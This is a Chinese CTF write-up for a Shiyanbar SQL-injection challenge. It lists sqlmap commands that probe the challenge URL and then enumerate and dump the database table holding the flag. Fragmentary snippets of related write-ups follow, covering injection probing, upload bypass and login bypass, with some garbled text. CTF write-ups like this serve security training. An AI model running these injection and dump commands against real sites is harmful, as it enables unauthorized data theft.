實驗吧web
題目:
很明顯。過年過節不送禮,送禮就送這個
格式:
解題連結: http://ctf5.shiyanbar.com/8/index.php?id=1
首先用sqlmap判斷是否存在sql注入
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"
然後爆出其資料庫名稱
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs
爆出其表
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1
爆出欄位
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
得到flage
相關推薦
實驗吧web題(26/26)全writeup!超詳細:)
替換 current repl tex 括號 註入 重定向 urn 其他 #簡單的SQL註入 http://www.shiyanbar.com/ctf/1875 1)試著在?id=1,沒有錯誤 2)試著?id=1‘,出錯了,有回顯,說明有註入點: You have an
實驗吧--web--天下武功唯快不破
nlp src his span cnblogs web 技術 bnl any ---恢復內容開始--- 英文翻譯過來嘛,就是:天下武功無快不破嘛。(出題者還是挺切題的) 看看前端源碼: 註意這裏 please post what you find with p
實驗吧web
題目: 很明顯。過年過節不送禮,送禮就送這個 格式: 解題連結: http://ctf5.shiyanbar.com/8/index.php?id=1 首先用sqlmap判斷是否存在sql注入 sqlmap -u "http://ctf5.shiyanbar.com/8
【fairy】實驗吧web題——爆破
最近沉迷於爆破= = 給你一個sha1值,它是0-100000之間的整數的md5值再求取sha1值,請在2秒內提交該整數值 題幹表述的很清楚,就是讓你碰撞出hash值對應的原來的值。 emmmm。又到了寫指令碼的時候了!!! 我們很容易發現提交資料為post請
實驗吧web-易-FALSE
先審計程式碼: <?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your
實驗吧Web-中-簡單的sql注入之2
輸入union select、order by這些關鍵字會提示SQLi detected! 說明對於關鍵字有防護 輸入1 union也會提示SQLi detected! 但是如果去掉空格:1union,則會返回正常,1'and'1'='1(無空格)也返回正常 所以可能是過濾了空格。
實驗吧web-易-上傳繞過
隨便上傳一個png檔案,出現提示 我們再上傳一個php檔案,卻出現提示 上傳遇到問題是肯定的,題目就是上傳繞過,所以我們下面要做的就是繞過檢測。 這裡使用00截斷。 首先在提交時抓包 我們將圖中upload/後面加上:123.php+ 將上面
實驗吧web-中-簡單的sql注入
頁面顯示:到底過濾了什麼東西? 所以我們先試試到底是過濾了什麼 1 顯示正常 1' 不正常 (直接輸入的關鍵字均會被過濾) 1 union select 顯示:1 select 1 union select table_name 顯示:1 table_name 1 unionuni
實驗吧web-中-忘記密碼了
開啟網頁,檢視原始碼,好像發現了管理員郵箱而且還是用vim編輯的。 我們提交一下這個郵箱,雖然提交成功了,但好像並沒什麼用。 我們隨便提交一個,會彈出 看來好像還有個step2呢,我們檢視原始碼(在這隻能用輸入view-source:的方式),發現
實驗吧Web-中-登陸一下好嗎??
題目上說:不要懷疑,我已經過濾了一切,還再逼你注入,哈哈哈哈哈! 可以試試,只要是輸入的關鍵字都被過濾了,雙寫也被過濾掉了。 用萬能密碼發現,or被過濾掉了。 這裡用到的是admin為:'=',密碼為:'='。 原理就是用的SQL語句的查詢。 內部的查詢語句: $sql
實驗吧——web之“看起來有點難”詳解
連結: 工具:kali(sqlmap) 解題思路及方法: 首先進入題目連結,看到這個分值,不禁讓我很擔心,這還是我第一個50分值的題目,而且難度也是難,給的說明也是那麼霸氣。。。。。。。 這些資訊都在向我們透露這題的難度,我也是抱著嘗試的心理去試試,並沒想
CTF實驗吧-WEB專題-5
1.上傳繞過 題解題目說是繞過,那就繞過吧,發現,上傳除了php檔案外會報需要傳php檔案,而傳php檔案則會報必須上傳.jpg這些圖片檔案,那就從上傳漏洞開始吧,一般常見的上傳漏洞就是截斷了,是0x00資料會截斷後續資料,當資料為abc.php0x001.jpg時
實驗吧 web題--注入類
1、登陸一下好嗎 SQL語句:select * from user where username='使用者名稱' and password='密碼' 嘗試1'='1並沒有得到flag,因為表中沒有us
實驗吧-WEB篇
0x00-頭有點大 題目連結 題目暗示響應頭資訊,抓包看看: 題目說需要有.net framework 9.91而且region of England,一看就知道是要改代理和語言:順便附上國家語言程式碼 修改Accept-Language
CTF實驗吧-WEB專題-6
分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!  
CTF實驗吧-WEB專題-1
分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!  
CTF實驗吧-WEB專題-4
分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!  
實驗吧-Web-天網管理系統
點開解題連結,會出現一個如下頁面: 乍一看,真好!使用者名稱,密碼都給填上了,可是。。。。點選“登入系統”。。。咦~沒反應!沒反應!!!好吧,F12檢視網頁原始碼 發現問題了。。。 我們看到註釋裡面有一個提示,當傳入的username值經md5加密後等於0,
實驗吧 WEB 頭有點大
http 技術 暫時 數據 需要 其他 -a bubuko 更新 看到了良心的提示,http header,之後看到了要求.NET framework 9.9 英國 IE,我想想.NET好像還沒有更新到9.9,就無視了這重要的提示。 我就看了一眼題解,發現burpsuit
實驗吧 WEB 簡單的sql注入
題目連結:http://www.shiyanbar.com/ctf/1875 題目提示:通過注入獲得flag值。 點開題目,又是一個簡潔的介面讓我一臉懵逼(0.0) 好吧,開始我們的注入之旅。 首先,隨便往框裡面輸入字元和數字,發現當輸入1、2、3的時候有查詢結果。 接